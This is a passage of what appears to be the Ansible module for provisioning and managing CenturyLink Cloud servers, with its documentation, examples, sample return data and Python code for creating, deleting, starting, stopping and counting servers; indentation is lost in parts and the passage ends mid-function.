- The template to use for server creation. Will search for a template if a partial string is provided.
This is required when state is 'present'
default: None
required: False
ttl:
description:
- The time to live for the server in seconds. The server will be deleted when this time expires.
default: None
required: False
type:
description:
- The type of server to create.
default: 'standard'
required: False
choices: ['standard', 'hyperscale', 'bareMetal']
configuration_id:
description:
- Only required for bare metal servers.
Specifies the identifier for the specific configuration type of bare metal server to deploy.
default: None
required: False
os_type:
description:
- Only required for bare metal servers.
Specifies the OS to provision with the bare metal server.
default: None
required: False
choices: ['redHat6_64Bit', 'centOS6_64Bit', 'windows2012R2Standard_64Bit', 'ubuntu14_64Bit']
wait:
description:
- Whether to wait for the provisioning tasks to finish before returning.
default: True
required: False
choices: [True, False]
requirements:
- python = 2.7
- requests >= 2.5.0
- clc-sdk
author: "CLC Runner (@clc-runner)"
notes:
- To use this module, it is required to set the below environment variables which enables access to the
Centurylink Cloud
- CLC_V2_API_USERNAME, the account login id for the centurylink cloud
- CLC_V2_API_PASSWORD, the account password for the centurylink cloud
- Alternatively, the module accepts the API token and account alias. The API token can be generated using the
CLC account login and password via the HTTP api call @ https://api.ctl.io/v2/authentication/login
- CLC_V2_API_TOKEN, the API token generated from https://api.ctl.io/v2/authentication/login
- CLC_ACCT_ALIAS, the account alias associated with the centurylink cloud
- Users can set CLC_V2_API_URL to specify an endpoint for pointing to a different CLC environment.
'''
EXAMPLES = '''
# Note - You must set the CLC_V2_API_USERNAME and CLC_V2_API_PASSWORD environment variables before running these examples
- name: Provision a single Ubuntu Server
clc_server:
name: test
template: ubuntu-14-64
count: 1
group: Default Group
state: present
- name: Ensure 'Default Group' has exactly 5 servers
clc_server:
name: test
template: ubuntu-14-64
exact_count: 5
count_group: Default Group
group: Default Group
- name: Stop a Server
clc_server:
server_ids:
- UC1ACCT-TEST01
state: stopped
- name: Start a Server
clc_server:
server_ids:
- UC1ACCT-TEST01
state: started
- name: Delete a Server
clc_server:
server_ids:
- UC1ACCT-TEST01
state: absent
'''
RETURN = '''
server_ids:
description: The list of server ids that are created
returned: success
type: list
sample:
[
"UC1TEST-SVR01",
"UC1TEST-SVR02"
]
partially_created_server_ids:
description: The list of server ids that are partially created
returned: success
type: list
sample:
[
"UC1TEST-SVR01",
"UC1TEST-SVR02"
]
servers:
description: The list of server objects returned from CLC
returned: success
type: list
sample:
[
{
"changeInfo":{
"createdBy":"service.wfad",
"createdDate":1438196820,
"modifiedBy":"service.wfad",
"modifiedDate":1438196820
},
"description":"test-server",
"details":{
"alertPolicies":[
],
"cpu":1,
"customFields":[
],
"diskCount":3,
"disks":[
{
"id":"0:0",
"partitionPaths":[
],
"sizeGB":1
},
{
"id":"0:1",
"partitionPaths":[
],
"sizeGB":2
},
{
"id":"0:2",
"partitionPaths":[
],
"sizeGB":14
}
],
"hostName":"",
"inMaintenanceMode":false,
"ipAddresses":[
{
"internal":"10.1.1.1"
}
],
"memoryGB":1,
"memoryMB":1024,
"partitions":[
],
"powerState":"started",
"snapshots":[
],
"storageGB":17
},
"groupId":"086ac1dfe0b6411989e8d1b77c4065f0",
"id":"test-server",
"ipaddress":"10.120.45.23",
"isTemplate":false,
"links":[
{
"href":"/v2/servers/wfad/test-server",
"id":"test-server",
"rel":"self",
"verbs":[
"GET",
"PATCH",
"DELETE"
]
},
{
"href":"/v2/groups/wfad/086ac1dfe0b6411989e8d1b77c4065f0",
"id":"086ac1dfe0b6411989e8d1b77c4065f0",
"rel":"group"
},
{
"href":"/v2/accounts/wfad",
"id":"wfad",
"rel":"account"
},
{
"href":"/v2/billing/wfad/serverPricing/test-server",
"rel":"billing"
},
{
"href":"/v2/servers/wfad/test-server/publicIPAddresses",
"rel":"publicIPAddresses",
"verbs":[
"POST"
]
},
{
"href":"/v2/servers/wfad/test-server/credentials",
"rel":"credentials"
},
{
"href":"/v2/servers/wfad/test-server/statistics",
"rel":"statistics"
},
{
"href":"/v2/servers/wfad/510ec21ae82d4dc89d28479753bf736a/upcomingScheduledActivities",
"rel":"upcomingScheduledActivities"
},
{
"href":"/v2/servers/wfad/510ec21ae82d4dc89d28479753bf736a/scheduledActivities",
"rel":"scheduledActivities",
"verbs":[
"GET",
"POST"
]
},
{
"href":"/v2/servers/wfad/test-server/capabilities",
"rel":"capabilities"
},
{
"href":"/v2/servers/wfad/test-server/alertPolicies",
"rel":"alertPolicyMappings",
"verbs":[
"POST"
]
},
{
"href":"/v2/servers/wfad/test-server/antiAffinityPolicy",
"rel":"antiAffinityPolicyMapping",
"verbs":[
"PUT",
"DELETE"
]
},
{
"href":"/v2/servers/wfad/test-server/cpuAutoscalePolicy",
"rel":"cpuAutoscalePolicyMapping",
"verbs":[
"PUT",
"DELETE"
]
}
],
"locationId":"UC1",
"name":"test-server",
"os":"ubuntu14_64Bit",
"osType":"Ubuntu 14 64-bit",
"status":"active",
"storageType":"standard",
"type":"standard"
}
]
'''
__version__ = '${version}'
import json
import os
import time
from distutils.version import LooseVersion
try:
import requests
except ImportError:
REQUESTS_FOUND = False
else:
REQUESTS_FOUND = True
#
# Requires the clc-python-sdk.
# sudo pip install clc-sdk
#
try:
import clc as clc_sdk
from clc import CLCException
from clc import APIFailedResponse
except ImportError:
CLC_FOUND = False
clc_sdk = None
else:
CLC_FOUND = True
from ansible.module_utils.basic import AnsibleModule
class ClcServer:
clc = clc_sdk
def __init__(self, module):
"""
Construct module
"""
self.clc = clc_sdk
self.module = module
self.group_dict = {}
if not CLC_FOUND:
self.module.fail_json(
msg='clc-python-sdk required for this module')
if not REQUESTS_FOUND:
self.module.fail_json(
msg='requests library is required for this module')
if requests.__version__ and LooseVersion(
requests.__version__) < LooseVersion('2.5.0'):
self.module.fail_json(
msg='requests library version should be >= 2.5.0')
self._set_user_agent(self.clc)
    def process_request(self):
        """
        Process the request - Main Code Path
        :return: Returns with either an exit_json or fail_json
        """
        changed = False
        new_server_ids = []
        server_dict_array = []
        self._set_clc_credentials_from_env()
        # _validate_module_params normalises the parameters and writes the
        # result back onto the module before any state handling runs.
        self.module.params = self._validate_module_params(
            self.clc,
            self.module)
        p = self.module.params
        state = p.get('state')
        #
        # Handle each state
        #
        partial_servers_ids = []
        if state == 'absent':
            server_ids = p['server_ids']
            if not isinstance(server_ids, list):
                return self.module.fail_json(
                    msg='server_ids needs to be a list of instances to delete: %s' %
                    server_ids)
            (changed,
             server_dict_array,
             new_server_ids) = self._delete_servers(module=self.module,
                                                    clc=self.clc,
                                                    server_ids=server_ids)
        elif state in ('started', 'stopped'):
            server_ids = p.get('server_ids')
            if not isinstance(server_ids, list):
                return self.module.fail_json(
                    msg='server_ids needs to be a list of servers to run: %s' %
                    server_ids)
            (changed,
             server_dict_array,
             new_server_ids) = self._start_stop_servers(self.module,
                                                        self.clc,
                                                        server_ids)
        elif state == 'present':
            # Changed is always set to true when provisioning new instances
            if not p.get('template') and p.get('type') != 'bareMetal':
                return self.module.fail_json(
                    msg='template parameter is required for new instance')
            # exact_count selects idempotent count enforcement against an
            # existing group instead of unconditional creation.
            if p.get('exact_count') is None:
                (server_dict_array,
                 new_server_ids,
                 partial_servers_ids,
                 changed) = self._create_servers(self.module,
                                                 self.clc)
            else:
                (server_dict_array,
                 new_server_ids,
                 partial_servers_ids,
                 changed) = self._enforce_count(self.module,
                                                self.clc)
        self.module.exit_json(
            changed=changed,
            server_ids=new_server_ids,
            partially_created_server_ids=partial_servers_ids,
            servers=server_dict_array)
    @staticmethod
    def _define_module_argument_spec():
        """
        Define the argument spec for the ansible module
        :return: argument spec dictionary
        """
        # Parameter definitions mirror the DOCUMENTATION block above; keep
        # the two in sync when editing either.
        argument_spec = dict(
            name=dict(),
            template=dict(),
            group=dict(default='Default Group'),
            network_id=dict(),
            location=dict(default=None),
            cpu=dict(default=1),
            memory=dict(default=1),
            alias=dict(default=None),
            password=dict(default=None, no_log=True),
            ip_address=dict(default=None),
            storage_type=dict(
                default='standard',
                choices=[
                    'standard',
                    'hyperscale']),
            type=dict(default='standard', choices=['standard', 'hyperscale', 'bareMetal']),
            primary_dns=dict(default=None),
            secondary_dns=dict(default=None),
            additional_disks=dict(type='list', default=[]),
            custom_fields=dict(type='list', default=[]),
            ttl=dict(default=None),
            managed_os=dict(type='bool', default=False),
            description=dict(default=None),
            source_server_password=dict(default=None, no_log=True),
            cpu_autoscale_policy_id=dict(default=None),
            anti_affinity_policy_id=dict(default=None),
            anti_affinity_policy_name=dict(default=None),
            alert_policy_id=dict(default=None),
            alert_policy_name=dict(default=None),
            packages=dict(type='list', default=[]),
            state=dict(
                default='present',
                choices=[
                    'present',
                    'absent',
                    'started',
                    'stopped']),
            count=dict(type='int', default=1),
            exact_count=dict(type='int', default=None),
            count_group=dict(),
            server_ids=dict(type='list', default=[]),
            add_public_ip=dict(type='bool', default=False),
            public_ip_protocol=dict(
                default='TCP',
                choices=[
                    'TCP',
                    'UDP',
                    'ICMP']),
            public_ip_ports=dict(type='list', default=[]),
            configuration_id=dict(default=None),
            os_type=dict(default=None,
                         choices=[
                             'redHat6_64Bit',
                             'centOS6_64Bit',
                             'windows2012R2Standard_64Bit',
                             'ubuntu14_64Bit'
                         ]),
            wait=dict(type='bool', default=True))
        # Pairs of parameters that must not be supplied together.
        mutually_exclusive = [
            ['exact_count', 'count'],
            ['exact_count', 'state'],
            ['anti_affinity_policy_id', 'anti_affinity_policy_name'],
            ['alert_policy_id', 'alert_policy_name'],
        ]
        return {"argument_spec": argument_spec,
                "mutually_exclusive": mutually_exclusive}
    def _set_clc_credentials_from_env(self):
        """
        Set the CLC Credentials on the sdk by reading environment variables
        Prefers a pre-issued API token (CLC_V2_API_TOKEN, which also requires
        CLC_ACCT_ALIAS); falls back to username/password; fails the module
        run when neither is available.
        :return: none
        """
        env = os.environ
        v2_api_token = env.get('CLC_V2_API_TOKEN', False)
        v2_api_username = env.get('CLC_V2_API_USERNAME', False)
        v2_api_passwd = env.get('CLC_V2_API_PASSWD', False)
        clc_alias = env.get('CLC_ACCT_ALIAS', False)
        api_url = env.get('CLC_V2_API_URL', False)
        # Optional endpoint override (e.g. staging environments).
        if api_url:
            self.clc.defaults.ENDPOINT_URL_V2 = api_url
        if v2_api_token and clc_alias:
            # Inject the token directly into the sdk's private state.
            self.clc._LOGIN_TOKEN_V2 = v2_api_token
            self.clc._V2_ENABLED = True
            self.clc.ALIAS = clc_alias
        elif v2_api_username and v2_api_passwd:
            self.clc.v2.SetCredentials(
                api_username=v2_api_username,
                api_passwd=v2_api_passwd)
        else:
            return self.module.fail_json(
                msg="You must set the CLC_V2_API_USERNAME and CLC_V2_API_PASSWD "
                "environment variables")
    @staticmethod
    def _validate_module_params(clc, module):
        """
        Validate the module params, and lookup default values.
        :param clc: clc-sdk instance to use
        :param module: module to validate
        :return: dictionary of validated params
        """
        params = module.params
        # The datacenter is resolved first because the template/group/network
        # lookups below all search within it.
        datacenter = ClcServer._find_datacenter(clc, module)
        ClcServer._validate_types(module)
        ClcServer._validate_name(module)
        # Fill in defaults and resolve names to ids in place.  Note that
        # 'group' is replaced with the group's id, not its name.
        params['alias'] = ClcServer._find_alias(clc, module)
        params['cpu'] = ClcServer._find_cpu(clc, module)
        params['memory'] = ClcServer._find_memory(clc, module)
        params['description'] = ClcServer._find_description(module)
        params['ttl'] = ClcServer._find_ttl(clc, module)
        params['template'] = ClcServer._find_template_id(module, datacenter)
        params['group'] = ClcServer._find_group(module, datacenter).id
        params['network_id'] = ClcServer._find_network_id(module, datacenter)
        params['anti_affinity_policy_id'] = ClcServer._find_aa_policy_id(
            clc,
            module)
        params['alert_policy_id'] = ClcServer._find_alert_policy_id(
            clc,
            module)
        return params
@staticmethod
def _find_datacenter(clc, module):
"""
Find the datacenter by calling the CLC API.
:param clc: clc-sdk instance to use
:param module: module to validate
:return: clc-sdk.Datacenter instance
"""
location = module.params.get('location')
try:
if not location:
account = clc.v2.Account()
location = account.data.get('primaryDataCenter')
data_center = clc.v2.Datacenter(location)
return data_center
except CLCException:
module.fail_json(msg="Unable to find location: {0}".format(location))
@staticmethod
def _find_alias(clc, module):
"""
Find or Validate the Account Alias by calling the CLC API
:param clc: clc-sdk instance to use
:param module: module to validate
:return: clc-sdk.Account instance
"""
alias = module.params.get('alias')
if not alias:
try:
alias = clc.v2.Account.GetAlias()
except CLCException as ex:
module.fail_json(msg='Unable to find account alias. {0}'.format(
ex.message
))
return alias
@staticmethod
def _find_cpu(clc, module):
"""
Find or validate the CPU value by calling the CLC API
:param clc: clc-sdk instance to use
:param module: module to validate
:return: Int value for CPU
"""
cpu = module.params.get('cpu')
group_id = module.params.get('group_id')
alias = module.params.get('alias')
state = module.params.get('state')
if not cpu and state == 'present':
group = clc.v2.Group(id=group_id,
alias=alias)
if group.Defaults("cpu"):
cpu = group.Defaults("cpu")
else:
module.fail_json(
msg=str("Can\'t determine a default cpu value. Please provide a value for cpu."))
return cpu
@staticmethod
def _find_memory(clc, module):
"""
Find or validate the Memory value by calling the CLC API
:param clc: clc-sdk instance to use
:param module: module to validate
:return: Int value for Memory
"""
memory = module.params.get('memory')
group_id = module.params.get('group_id')
alias = module.params.get('alias')
state = module.params.get('state')
if not memory and state == 'present':
group = clc.v2.Group(id=group_id,
alias=alias)
if group.Defaults("memory"):
memory = group.Defaults("memory")
else:
module.fail_json(msg=str(
"Can\'t determine a default memory value. Please provide a value for memory."))
return memory
@staticmethod
def _find_description(module):
"""
Set the description module param to name if description is blank
:param module: the module to validate
:return: string description
"""
description = module.params.get('description')
if not description:
description = module.params.get('name')
return description
@staticmethod
def _validate_types(module):
"""
Validate that type and storage_type are set appropriately, and fail if not
:param module: the module to validate
:return: none
"""
state = module.params.get('state')
server_type = module.params.get(
'type').lower() if module.params.get('type') else None
storage_type = module.params.get(
'storage_type').lower() if module.params.get('storage_type') else None
if state == "present":
if server_type == "standard" and storage_type not in (
"standard", "premium"):
module.fail_json(
msg=str("Standard VMs must have storage_type = 'standard' or 'premium'"))
if server_type == "hyperscale" and storage_type != "hyperscale":
module.fail_json(
msg=str("Hyperscale VMs must have storage_type = 'hyperscale'"))
@staticmethod
def _validate_name(module):
"""
Validate that name is the correct length if provided, fail if it's not
:param module: the module to validate
:return: none
"""
server_name = module.params.get('name')
state = module.params.get('state')
if state == 'present' and (
len(server_name) < 1 or len(server_name) > 6):
module.fail_json(msg=str(
"When state = 'present', name must be a string with a minimum length of 1 and a maximum length of 6"))
@staticmethod
def _find_ttl(clc, module):
"""
Validate that TTL is > 3600 if set, and fail if not
:param clc: clc-sdk instance to use
:param module: module to validate
:return: validated ttl
"""
ttl = module.params.get('ttl')
if ttl:
if ttl <= 3600:
return module.fail_json(msg=str("Ttl cannot be <= 3600"))
else:
ttl = clc.v2.time_utils.SecondsToZuluTS(int(time.time()) + ttl)
return ttl
@staticmethod
def _find_template_id(module, datacenter):
"""
Find the template id by calling the CLC API.
:param module: the module to validate
:param datacenter: the datacenter to search for the template
:return: a valid clc template id
"""
lookup_template = module.params.get('template')
state = module.params.get('state')
type = module.params.get('type')
result = None
if state == 'present' and type != 'bareMetal':
try:
result = datacenter.Templates().Search(lookup_template)[0].id
except CLCException:
module.fail_json(
msg=str(
"Unable to find a template: " +
lookup_template +
" in location: " +
datacenter.id))
return result
@staticmethod
def _find_network_id(module, datacenter):
"""
Validate the provided network id or return a default.
:param module: the module to validate
:param datacenter: the datacenter to search for a network id
:return: a valid network id
"""
network_id = module.params.get('network_id')
if not network_id:
try:
network_id = datacenter.Networks().networks[0].id
# -- added for clc-sdk 2.23 compatibility
# datacenter_networks = clc_sdk.v2.Networks(
# networks_lst=datacenter._DeploymentCapabilities()['deployableNetworks'])
# network_id = datacenter_networks.networks[0].id
# -- end
except CLCException:
module.fail_json(
msg=str(
"Unable to find a network in location: " +
datacenter.id))
return network_id
@staticmethod
def _find_aa_policy_id(clc, module):
"""
Validate if the anti affinity policy exist for the given name and throw error if not
:param clc: the clc-sdk instance
:param module: the module to validate
:return: aa_policy_id: the anti affinity policy id of the given name.
"""
aa_policy_id = module.params.get('anti_affinity_policy_id')
aa_policy_name = module.params.get('anti_affinity_policy_name')
if not aa_policy_id and aa_policy_name:
alias = module.params.get('alias')
aa_policy_id = ClcServer._get_anti_affinity_policy_id(
clc,
module,
alias,
aa_policy_name)
if not aa_policy_id:
module.fail_json(
msg='No anti affinity policy was found with policy name : %s' % aa_policy_name)
return aa_policy_id
@staticmethod
def _find_alert_policy_id(clc, module):
"""
Validate if the alert policy exist for the given name and throw error if not
:param clc: the clc-sdk instance
:param module: the module to validate
:return: alert_policy_id: the alert policy id of the given name.
"""
alert_policy_id = module.params.get('alert_policy_id')
alert_policy_name = module.params.get('alert_policy_name')
if not alert_policy_id and alert_policy_name:
alias = module.params.get('alias')
alert_policy_id = ClcServer._get_alert_policy_id_by_name(
clc=clc,
module=module,
alias=alias,
alert_policy_name=alert_policy_name
)
if not alert_policy_id:
module.fail_json(
msg='No alert policy exist with name : %s' % alert_policy_name)
return alert_policy_id
    def _create_servers(self, module, clc, override_count=None):
        """
        Create New Servers in CLC cloud
        :param module: the AnsibleModule object
        :param clc: the clc-sdk instance to use
        :param override_count: optional count that takes precedence over the
            module's 'count' param (used by _enforce_count)
        :return: tuple of (server_dict_array, created_server_ids,
            partial_created_servers_ids, changed)
        """
        p = module.params
        request_list = []
        servers = []
        server_dict_array = []
        created_server_ids = []
        partial_created_servers_ids = []
        add_public_ip = p.get('add_public_ip')
        public_ip_protocol = p.get('public_ip_protocol')
        public_ip_ports = p.get('public_ip_ports')
        # Build the create-request parameters.  NOTE: 'group' was already
        # resolved to a group id by _validate_module_params, hence 'group_id'.
        params = {
            'name': p.get('name'),
            'template': p.get('template'),
            'group_id': p.get('group'),
            'network_id': p.get('network_id'),
            'cpu': p.get('cpu'),
            'memory': p.get('memory'),
            'alias': p.get('alias'),
            'password': p.get('password'),
            'ip_address': p.get('ip_address'),
            'storage_type': p.get('storage_type'),
            'type': p.get('type'),
            'primary_dns': p.get('primary_dns'),
            'secondary_dns': p.get('secondary_dns'),
            'additional_disks': p.get('additional_disks'),
            'custom_fields': p.get('custom_fields'),
            'ttl': p.get('ttl'),
            'managed_os': p.get('managed_os'),
            'description': p.get('description'),
            'source_server_password': p.get('source_server_password'),
            'cpu_autoscale_policy_id': p.get('cpu_autoscale_policy_id'),
            'anti_affinity_policy_id': p.get('anti_affinity_policy_id'),
            'packages': p.get('packages'),
            'configuration_id': p.get('configuration_id'),
            'os_type': p.get('os_type')
        }
        count = override_count if override_count else p.get('count')
        # A zero count means nothing to do; report unchanged.
        changed = False if count == 0 else True
        if not changed:
            return server_dict_array, created_server_ids, partial_created_servers_ids, changed
        for i in range(0, count):
            if not module.check_mode:
                req = self._create_clc_server(clc=clc,
                                              module=module,
                                              server_params=params)
                server = req.requests[0].Server()
                request_list.append(req)
                servers.append(server)
        self._wait_for_requests(module, request_list)
        self._refresh_servers(module, servers)
        # Post-provisioning: attach public IPs and alert policies.  Servers
        # failing either step are reported as partially created.
        ip_failed_servers = self._add_public_ip_to_servers(
            module=module,
            should_add_public_ip=add_public_ip,
            servers=servers,
            public_ip_protocol=public_ip_protocol,
            public_ip_ports=public_ip_ports)
        ap_failed_servers = self._add_alert_policy_to_servers(clc=clc,
                                                              module=module,
                                                              servers=servers)
        for server in servers:
            if server in ip_failed_servers or server in ap_failed_servers:
                partial_created_servers_ids.append(server.id)
            else:
                # reload server details
                server = clc.v2.Server(server.id)
                server.data['ipaddress'] = server.details[
                    'ipAddresses'][0]['internal']
                if add_public_ip and len(server.PublicIPs().public_ips) > 0:
                    server.data['publicip'] = str(
                        server.PublicIPs().public_ips[0])
                created_server_ids.append(server.id)
                server_dict_array.append(server.data)
        return server_dict_array, created_server_ids, partial_created_servers_ids, changed
    def _enforce_count(self, module, clc):
        """
        Enforce that there is the right number of servers in the provided group.
        Starts or stops servers as necessary.
        :param module: the AnsibleModule object
        :param clc: the clc-sdk instance to use
        :return: tuple of (server_dict_array, changed_server_ids,
            partial_servers_ids, changed)
        """
        p = module.params
        changed = False
        count_group = p.get('count_group')
        datacenter = ClcServer._find_datacenter(clc, module)
        exact_count = p.get('exact_count')
        server_dict_array = []
        partial_servers_ids = []
        changed_server_ids = []
        # fail here if the exact count was specified without filtering
        # on a group, as this may lead to a undesired removal of instances
        if exact_count and count_group is None:
            return module.fail_json(
                msg="you must use the 'count_group' option with exact_count")
        servers, running_servers = ClcServer._find_running_servers_by_group(
            module, datacenter, count_group)
        # Converge: equal -> no-op, fewer -> create, more -> delete.
        if len(running_servers) == exact_count:
            changed = False
        elif len(running_servers) < exact_count:
            to_create = exact_count - len(running_servers)
            server_dict_array, changed_server_ids, partial_servers_ids, changed \
                = self._create_servers(module, clc, override_count=to_create)
            for server in server_dict_array:
                running_servers.append(server)
        elif len(running_servers) > exact_count:
            # Deletions target the lexically-smallest server ids first.
            to_remove = len(running_servers) - exact_count
            all_server_ids = sorted([x.id for x in running_servers])
            remove_ids = all_server_ids[0:to_remove]
            (changed, server_dict_array, changed_server_ids) \
                = ClcServer._delete_servers(module, clc, remove_ids)
        return server_dict_array, changed_server_ids, partial_servers_ids, changed
@staticmethod
def _wait_for_requests(module, request_list):
"""
Block until server provisioning requests are completed.
:param module: the AnsibleModule object
:param request_list: a list of clc-sdk.Request instances
:return: none
"""
wait = module.params.get('wait')
if wait:
# Requests.WaitUntilComplete() returns the count of failed requests
failed_requests_count = sum(
[request.WaitUntilComplete() for request in request_list])
if failed_requests_count > 0:
module.fail_json(
msg='Unable to process server request')
@staticmethod
def _refresh_servers(module, servers):
"""
Loop through a list of servers and refresh them.
:param module: the AnsibleModule object
:param servers: list of clc-sdk.Server instances to refresh
:return: none
"""
for server in servers:
try:
server.Refresh()
except CLCException as ex:
module.fail_json(msg='Unable to refresh the server {0}. {1}'.format(
server.id, ex.message
))
@staticmethod
def _add_public_ip_to_servers(
module,
should_add_public_ip,
servers,
public_ip_protocol,
public_ip_ports):
"""
Create a public IP for servers
:param module: the AnsibleModule object
:param should_add_public_ip: boolean - whether or not to provision a public ip for servers. Skipped if False
:param servers: List of servers to add public ips to
:param public_ip_protocol: a protocol to allow for the public ips
:param public_ip_ports: list of ports to allow for the public ips
:return: none
"""
failed_servers = []
if not should_add_public_ip:
return failed_servers
ports_lst = []
request_list = []
server = None
for port in public_ip_ports:
ports_lst.append(
{'protocol': public_ip_protocol, 'port': port})
try:
if not module.check_mode:
for server in servers:
request = server.PublicIPs().Add(ports_lst)
request_list.append(request)
except APIFailedResponse:
failed_servers.append(server)
ClcServer._wait_for_requests(module, request_list)
return failed_servers
@staticmethod
def _add_alert_policy_to_servers(clc, module, servers):
"""
Associate the alert policy to servers
:param clc: the clc-sdk instance to use
:param module: the AnsibleModule object
:param servers: List of servers to add alert policy to
:return: failed_servers: the list of servers which failed while associating alert policy
"""
failed_servers = []
p = module.params
alert_policy_id = p.get('alert_policy_id')
alias = p.get('alias')
if alert_policy_id and not module.check_mode:
for server in servers:
try:
ClcServer._add_alert_policy_to_server(
clc=clc,
alias=alias,
server_id=server.id,
alert_policy_id=alert_policy_id)
except CLCException:
failed_servers.append(server)
return failed_servers
@staticmethod
def _add_alert_policy_to_server(
clc, alias, server_id, alert_policy_id):
"""
Associate an alert policy to a clc server
:param clc: the clc-sdk instance to use
:param alias: the clc account alias
:param server_id: The clc server id
:param alert_policy_id: the alert policy id to be associated to the server
:return: none
"""
try:
clc.v2.API.Call(
method='POST',
url='servers/%s/%s/alertPolicies' % (alias, server_id),
payload=json.dumps(
{
'id': alert_policy_id
}))
except APIFailedResponse as e:
raise CLCException(
'Failed to associate alert policy to the server : {0} with Error {1}'.format(
server_id, str(e.response_text)))
@staticmethod
def _get_alert_policy_id_by_name(clc, module, alias, alert_policy_name):
"""
Returns the alert policy id for the given alert policy name
:param clc: the clc-sdk instance to use
:param module: the AnsibleModule object
:param alias: the clc account alias
:param alert_policy_name: the name of the alert policy
:return: alert_policy_id: the alert policy id
"""
alert_policy_id = None
policies = clc.v2.API.Call('GET', '/v2/alertPolicies/%s' % alias)
if not policies:
return alert_policy_id
for policy in policies.get('items'):
if policy.get('name') == alert_policy_name:
if not alert_policy_id:
alert_policy_id = policy.get('id')
else:
return module.fail_json(
msg='multiple alert policies were found with policy name : %s' % alert_policy_name)
return alert_policy_id
@staticmethod
def _delete_servers(module, clc, server_ids):
"""
Delete the servers on the provided list
:param module: the AnsibleModule object
:param clc: the clc-sdk instance to use
:param server_ids: list of servers to delete
:return: a list of dictionaries with server information about the servers that were deleted
"""
terminated_server_ids = []
server_dict_array = []
request_list = []
if not isinstance(server_ids, list) or len(server_ids) < 1:
return module.fail_json(
msg='server_ids should be a list of servers, aborting')
servers = clc.v2.Servers(server_ids).Servers()
for server in servers:
if not module.check_mode:
request_list.append(server.Delete())
ClcServer._wait_for_requests(module, request_list)
for server in servers:
terminated_server_ids.append(server.id)
return True, server_dict_array, terminated_server_ids
    @staticmethod
    def _start_stop_servers(module, clc, server_ids):
        """
        Start or Stop the servers on the provided list
        :param module: the AnsibleModule object
        :param clc: the clc-sdk instance to use
        :param server_ids: list of servers to start or stop
        :return: tuple of (changed, server_dict_array, result_server_ids)
        """
        p = module.params
        state = p.get('state')
        changed = False
        changed_servers = []
        server_dict_array = []
        result_server_ids = []
        request_list = []
        if not isinstance(server_ids, list) or len(server_ids) < 1:
            return module.fail_json(
                msg='server_ids should be a list of servers, aborting')
        servers = clc.v2.Servers(server_ids).Servers()
        for server in servers:
            # Only act on servers that are not already in the desired state.
            if server.powerState != state:
                changed_servers.append(server)
                if not module.check_mode:
                    request_list.append(
                        ClcServer._change_server_power_state(
                            module,
                            server,
                            state))
                changed = True
        ClcServer._wait_for_requests(module, request_list)
        ClcServer._refresh_servers(module, changed_servers)
        # Report on every requested server, changed or not.
        for server in set(changed_servers + servers):
            try:
                server.data['ipaddress'] = server.details[
                    'ipAddresses'][0]['internal']
                server.data['publicip'] = str(
                    server.PublicIPs().public_ips[0])
            except (KeyError, IndexError):
                # Best effort: servers without addresses are reported
                # without address fields.
                pass
            server_dict_array.append(server.data)
            result_server_ids.append(server.id)
        return changed, server_dict_array, result_server_ids
@staticmethod
def _change_server_power_state(module, server, state):
"""
Change the server powerState
:param module: the module to check for intended state
:param server: the server to start or stop
:param state: the intended powerState for the server
:return: the request object from clc-sdk call
"""
result = None
try:
if state == 'started':
result = server.PowerOn()
else:
# Try to shut down the server and fall back to power off when unable to shut down.
result = server.ShutDown()
if result and hasattr(result, 'requests') and result.requests[0]:
return result
else:
result = server.PowerOff()
except CLCException:
module.fail_json(
msg='Unable to change power state for server {0}'.format(
server.id))
return result
@staticmethod
def _find_running_servers_by_group(module, datacenter, count_group):
"""
Find a list of running servers in the provided group
:param module: the AnsibleModule object
:param datacenter: the clc-sdk.Datacenter instance to use to lookup the group
:param count_group: the group to count the servers
:return: list of servers, and list of running servers
"""
group = ClcServer._find_group(
module=module,
datacenter=datacenter,
lookup_group=count_group)
servers = group.Servers().Servers()
running_servers = []
for server in servers:
if server.status == 'active' and server.powerState == 'started':
running_servers.append(server)
return servers, running_servers
@staticmethod
def _find_group(module, datacenter, lookup_group=None):
"""
Find a server group in a datacenter by calling the CLC API
:param module: the AnsibleModule instance
:param datacenter: clc-sdk.Datacenter instance to search for the group
:param lookup_group: string name of the group to search for
:return: clc-sdk.Group instance
"""
if not lookup_group:
lookup_group = module.params.get('group')
try:
return datacenter.Groups().Get(lookup_group)
except CLCException:
pass
# The search above only acts on the main
result = ClcServer._find_group_recursive(
module,
datacenter.Groups(),
lookup_group)
if result is None:
module.fail_json(
msg=str(
"Unable to find group: " +
lookup_group +
" in location: " +
datacenter.id))
return result
@staticmethod
def _find_group_recursive(module, group_list, lookup_group):
"""
Find a server group by recursively walking the tree
:param module: the AnsibleModule instance to use
:param group_list: a list of groups to search
:param lookup_group: the group to look for
:return: list of groups
"""
result = None
for group in group_list.groups:
subgroups = group.Subgroups()
try:
return subgroups.Get(lookup_group)
except CLCException:
result = ClcServer._find_group_recursive(
module,
subgroups,
lookup_group)
if result is not None:
break
return result
    @staticmethod
    def _create_clc_server(
            clc,
            module,
            server_params):
        """
        Call the CLC Rest API to Create a Server
        :param clc: the clc-python-sdk instance to use
        :param module: the AnsibleModule instance to use
        :param server_params: a dictionary of params to use to create the servers
        :return: clc-sdk.Request object linked to the queued server request
        """
        try:
            # Map the module's snake_case params onto the API's camelCase
            # payload fields.
            res = clc.v2.API.Call(
                method='POST',
                url='servers/%s' %
                (server_params.get('alias')),
                payload=json.dumps(
                    {
                        'name': server_params.get('name'),
                        'description': server_params.get('description'),
                        'groupId': server_params.get('group_id'),
                        'sourceServerId': server_params.get('template'),
                        'isManagedOS': server_params.get('managed_os'),
                        'primaryDNS': server_params.get('primary_dns'),
                        'secondaryDNS': server_params.get('secondary_dns'),
                        'networkId': server_params.get('network_id'),
                        'ipAddress': server_params.get('ip_address'),
                        'password': server_params.get('password'),
                        'sourceServerPassword': server_params.get('source_server_password'),
                        'cpu': server_params.get('cpu'),
                        'cpuAutoscalePolicyId': server_params.get('cpu_autoscale_policy_id'),
                        'memoryGB': server_params.get('memory'),
                        'type': server_params.get('type'),
                        'storageType': server_params.get('storage_type'),
                        'antiAffinityPolicyId': server_params.get('anti_affinity_policy_id'),
                        'customFields': server_params.get('custom_fields'),
                        'additionalDisks': server_params.get('additional_disks'),
                        'ttl': server_params.get('ttl'),
                        'packages': server_params.get('packages'),
                        'configurationId': server_params.get('configuration_id'),
                        'osType': server_params.get('os_type')}))
            result = clc.v2.Requests(res)
        except APIFailedResponse as ex:
            return module.fail_json(msg='Unable to create the server: {0}. {1}'.format(
                server_params.get('name'),
                ex.response_text
            ))
        #
        # Patch the Request object so that it returns a valid server
        # Find the server's UUID from the API response
